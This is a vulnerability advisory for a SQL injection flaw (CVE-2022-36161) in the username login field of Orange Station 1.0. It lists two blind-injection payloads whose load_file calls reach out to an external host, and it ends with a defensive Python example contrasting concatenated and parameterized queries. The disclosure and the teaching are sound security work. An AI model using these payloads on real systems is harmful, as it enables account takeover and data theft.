Headline
CVE-2022-36161: CVE-nu11secur1ty/vendors/mayuri_k/2022/Orange-Station-1.0 at main · nu11secur1ty/CVE-nu11secur1ty
Orange Station 1.0 was discovered to contain a SQL injection vulnerability via the username parameter.
Description:
The username parameter appears to be vulnerable to SQL injection attacks. An attacker can take control of the administrator account and of all other accounts, and can also download all information about this system.
Status: CRITICAL
[+] Payloads:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]'+(select load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+'' OR NOT 8287=8287 AND 'jOHi'='jOHi&password=rootadmin&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username[email protected]'+(select load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+'' AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND 'yPPS'='yPPS&password=rootadmin&login=
---
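The flaw class reported above, shown as an added example (not code from Orange Station or from the advisory): a login query built by string concatenation next to its parameterized form, run against a constructed table with a constructed input. SQLite stands in for the MySQL backend, and the table, column and function names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed in-memory account table (assumed schema, not the application's).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin@example.test", "s3cret-hash", "admin"),
         ("clerk@example.test", "other-hash", "user")],
    )
    return db


def login_concatenated(db, username, password):
    # Vulnerable pattern: POST values are spliced into the SQL text, so a quote
    # in `username` closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT username, role FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def login_parameterized(db, username, password):
    # Hardened pattern: the statement text is fixed and the values are bound
    # separately, so they are only ever compared as data.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def demo():
    db = make_db()
    # Constructed input: the quote ends the literal and the OR branch makes the
    # WHERE clause true for the admin row without the right password.
    crafted = "admin@example.test' OR 'a'='a"
    return {
        "concatenated": login_concatenated(db, crafted, "wrong"),
        "parameterized": login_parameterized(db, crafted, "wrong"),
        "valid_login": login_parameterized(db, "admin@example.test", "s3cret-hash"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

The direct password comparison is kept only to keep the example short; binding parameters is the fix for the injection, and stored passwords should still be hashed and verified separately.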